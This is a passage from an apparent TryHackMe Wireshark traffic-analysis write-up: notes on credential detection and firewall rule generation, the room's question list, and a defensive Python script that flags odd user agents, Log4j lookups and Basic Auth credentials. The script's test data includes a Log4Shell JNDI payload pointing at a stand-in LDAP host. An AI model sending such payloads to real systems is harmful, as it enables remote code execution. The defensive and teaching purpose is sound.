You can view detected credentials using the "Tools → Credentials" menu. This feature is available only in Wireshark v3.1 and later. Since it works only with particular protocols, it is suggested that you perform manual checks as well and do not rely entirely on this feature to decide whether there are cleartext credentials in the traffic.

Once you use the feature, it will open a new window and provide detected credentials. It will show the packet number, protocol, username and additional information. This window is clickable; clicking on the packet number will select the packet containing the password, and clicking on the username will select the packet containing the username info.
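As an added example that is not part of the room or this write-up, the following Python script covers the HTTP checks from Task 7 and this task in one pass over raw requests: it compares each User-Agent against a baseline set and reports one-letter near-misses by edit distance, flags Log4j-style ${jndi:...} lookup strings and extracts their target, and decodes HTTP Basic Auth credentials, calling out an empty password explicitly. The requests, host names, address and credentials are constructed inline and are assumptions, not data from the room's captures; the baseline set and the near-miss distance are assumptions too.

```python
import base64
import re


def edit_distance(a, b):
    """Levenshtein distance; catches one-character impersonations of a known user agent."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        current = [i]
        for j, cb in enumerate(b, 1):
            current.append(min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + (ca != cb)))
        previous = current
    return previous[-1]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into its request line and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line, headers


def user_agent_verdict(ua, baseline, near_miss=2):
    """'baseline' if known, 'near-miss of <ua>' for a subtle spelling change,
    'jndi-lookup' for Log4Shell-style strings, otherwise 'unknown'."""
    if re.search(r"\$\{jndi:", ua, re.IGNORECASE):
        return "jndi-lookup"
    if ua in baseline:
        return "baseline"
    if not baseline:
        return "unknown"
    closest = min(baseline, key=lambda known: edit_distance(ua, known))
    if edit_distance(ua, closest) <= near_miss:
        return f"near-miss of {closest}"
    return "unknown"


def basic_credentials(headers):
    """Decode 'Authorization: Basic <base64>' into (user, password); an empty password is a finding too."""
    value = headers.get("authorization", "")
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    user, _, password = base64.b64decode(token).decode(errors="replace").partition(":")
    return user, password


def analyze_requests(raw_requests, baseline):
    """Per-request findings: user-agent verdict, JNDI lookup target if any, cleartext credentials if any."""
    findings = []
    for number, raw in enumerate(raw_requests, 1):
        request_line, headers = parse_request(raw)
        ua = headers.get("user-agent", "")
        lookup = re.search(r"\$\{jndi:(\w+)://([^/}\s]+)", ua, re.IGNORECASE)
        creds = basic_credentials(headers)
        findings.append({
            "packet": number,
            "request": request_line,
            "user_agent": ua,
            "verdict": user_agent_verdict(ua, baseline),
            "jndi_target": f"{lookup.group(1)}://{lookup.group(2)}" if lookup else None,
            "credentials": creds,
            "empty_password": creds is not None and creds[1] == "",
        })
    return findings


# Constructed sample (assumed host names, address and credentials; not the room's captures).
FIREFOX = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"
BASELINE = {FIREFOX}


def request(path, ua, extra=""):
    return f"GET {path} HTTP/1.1\r\nHost: www.example.org\r\nUser-Agent: {ua}\r\n{extra}\r\n"


SAMPLE = [
    request("/", FIREFOX),
    request("/admin", FIREFOX, "Authorization: Basic " + base64.b64encode(b"admin:secret").decode() + "\r\n"),
    request("/admin", FIREFOX.replace("Mozilla", "Mozila"),
            "Authorization: Basic " + base64.b64encode(b"bob:").decode() + "\r\n"),
    request("/index.php", "${jndi:ldap://203.0.113.5:1389/a}"),
    request("/robots.txt", "sqlmap/1.7"),
]

if __name__ == "__main__":
    for f in analyze_requests(SAMPLE, BASELINE):
        print(f["packet"], f["verdict"], f["jndi_target"], f["credentials"],
              "EMPTY PASSWORD" if f["empty_password"] else "")
```

The baseline is a set you build from the capture itself (the strings that dozens of hosts send), not an allowlist: the point of the edit-distance check is that a string one letter away from the common one is more suspicious than a string that is obviously foreign, because it was chosen to pass a glance.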

Task 10: Bonus Actionable Results

As a security analyst, there will be cases where you need to spot the anomaly, identify the source and take action. Wireshark is not only about packet details; it can also generate firewall rules that are ready to implement with a couple of clicks.

You can create firewall rules by using the “Tools → Firewall ACL Rules” menu. Once you use this feature, it will open a new window and provide a combination of rules (IP, port and MAC address-based) for different purposes.

Note that these rules are generated for implementation on an outside firewall interface.

Currently, Wireshark can create rules for:

  • Netfilter (iptables)
  • Cisco IOS (standard/extended)
  • IP Filter (ipfilter)
  • IPFirewall (ipfw)
  • Packet filter (pf)
  • Windows Firewall (netsh new/old format)

Wireshark: Traffic Analysis Room Answers

Remember, due to Medium’s Formatting, Some elements such as Room Answers and much more are dropped. Please visit this page for the full tutorial via Notion.

Task 2: Nmap Scans
Use the "Desktop/exercise-pcaps/nmap/Exercise .pcapng" file.
  • What is the total number of the "TCP Connect" scans?
  • Which scan type is used to scan the TCP port 80?
  • How many "UDP close port" messages are there?
  • Which UDP port in the 55–70 port range is open?

Task 3: ARP Poisoning & Man in the Middle
Use the "Desktop/exercise-pcaps/arp/Exercise.pcapng" file.
  • What is the number of ARP requests crafted by the attacker?
  • What is the number of HTTP packets received by the attacker?
  • What is the number of sniffed username & password entries?
  • What is the password of the "Client986"?
  • What is the comment provided by the "Client354"?

Task 4: Identifying Hosts: DHCP, NetBIOS and Kerberos
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/dhcp-netbios.pcap" file.
  • What is the MAC address of the host "Galaxy A30"?
  • How many NetBIOS registration requests does the "LIVALJM" workstation have?
  • Which host requested the IP address "172.16.13.85"?
Use the "Desktop/exercise-pcaps/dhcp-netbios-kerberos/kerberos.pcap" file.
  • What is the IP address of the user "u5"? (Enter the address in defanged format.)
  • What is the hostname of the available host in the Kerberos packets?

Task 5: Tunneling Traffic: DNS and ICMP
Use the "Desktop/exercise-pcaps/dns-icmp/icmp-tunnel.pcap" file.
  • Investigate the anomalous packets. Which protocol is used in ICMP tunnelling?
Use the "Desktop/exercise-pcaps/dns-icmp/dns.pcap" file.
  • Investigate the anomalous packets. What is the suspicious main domain address that receives anomalous DNS queries? (Enter the address in defanged format.)

Task 6: Cleartext Protocol Analysis: FTP
Use the "Desktop/exercise-pcaps/ftp/ftp.pcap" file.
  • How many incorrect login attempts are there?
  • What is the size of the file accessed by the "ftp" account?
  • The adversary uploaded a document to the FTP server. What is the filename?
  • The adversary tried to assign special flags to change the executing permissions of the uploaded file. What is the command used by the adversary?

Task 7: Cleartext Protocol Analysis: HTTP
Use the "Desktop/exercise-pcaps/http/useragent.cap" file.
  • Investigate the user agents. What is the number of anomalous "user-agent" types?
  • What is the packet number with a subtle spelling difference in the user agent field?
Use the "Desktop/exercise-pcaps/http/http.pcapng" file.
  • Locate the "Log4j" attack starting phase. What is the packet number?
  • Locate the "Log4j" attack starting phase and decode the base64 command. What is the IP address contacted by the adversary? (Enter the address in defanged format and exclude "{}".)

Task 8: Encrypted Protocol Analysis: Decrypting HTTPS
Use the "Desktop/exercise-pcaps/https/Exercise.pcap" file.
  • What is the frame number of the "Client Hello" message sent to "accounts.google.com"?
  • Decrypt the traffic with the "KeysLogFile.txt" file. What is the number of HTTP2 packets?
  • Go to Frame 322. What is the authority header of the HTTP2 packet? (Enter the address in defanged format.)
  • Investigate the decrypted packets and find the flag! What is the flag?

Task 9: Bonus: Hunt Cleartext Credentials!
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file.
  • What is the packet number of the credentials using "HTTP Basic Auth"?
  • What is the packet number where "empty password" was submitted?

Task 10: Bonus Actionable Results
Use the "Desktop/exercise-pcaps/bonus/Bonus-exercise.pcap" file.
  • Select packet number 99. Create a rule for "IPFirewall (ipfw)". What is the rule for "denying source IPv4 address"?
  • Select packet number 231. Create "IPFirewall" rules. What is the rule for "allowing destination MAC address"?

You can find other TryHackme Wireshark Rooms such as Wireshark 101; Wireshark The Basics; and Wireshark Packet Operations here.


Cyber Rey

Technophile | Woman in Cybersecurity | Cybersecurity Awareness Advocate!